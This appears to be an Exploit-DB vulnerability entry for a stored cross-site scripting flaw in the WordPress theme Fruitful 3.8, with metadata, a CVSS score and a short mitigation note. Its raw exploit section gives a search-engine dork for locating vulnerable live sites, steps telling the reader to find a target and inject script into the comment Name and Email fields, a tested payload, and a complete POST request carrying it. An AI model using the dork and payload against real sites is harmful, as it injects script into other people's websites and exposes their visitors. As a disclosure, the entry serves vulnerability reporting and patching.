WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting

vendor:

Fruitful

by:

Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)

7.5

CVSS

HIGH

Persistent Cross-Site Scripting

CWE

Product Name: Fruitful

Affected Version From: 3.8

Affected Version To: 3.8

Patch Exists: NO

Related CWE: N/A

CPE: a:fruitfulcode:fruitful

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows/Linux

2020

WordPress Theme Fruitful 3.8 – Persistent Cross-Site Scripting

Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design. To exploit this vulnerability, an attacker can inject malicious JavaScript code into the Name and Email fields of the comment form. When the comment is posted, the malicious code will be executed in the browser of the user who views the comment.

Mitigation:

To mitigate this vulnerability, the application should validate user input and sanitize it before displaying it to other users.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
# Date: 2020-02-14
# Category : Webapps
# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip
# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Version: 3.8
# Tested on: Windows/Linux
# CVE: N/A

.:: Theme Description ::.
Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design.

.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With above Dork.
Step 2 - Inject Your Java Script Codes to Name & Email Fields
Step 3 - Click Post Comment

.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>

.:: Post Request ::.
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145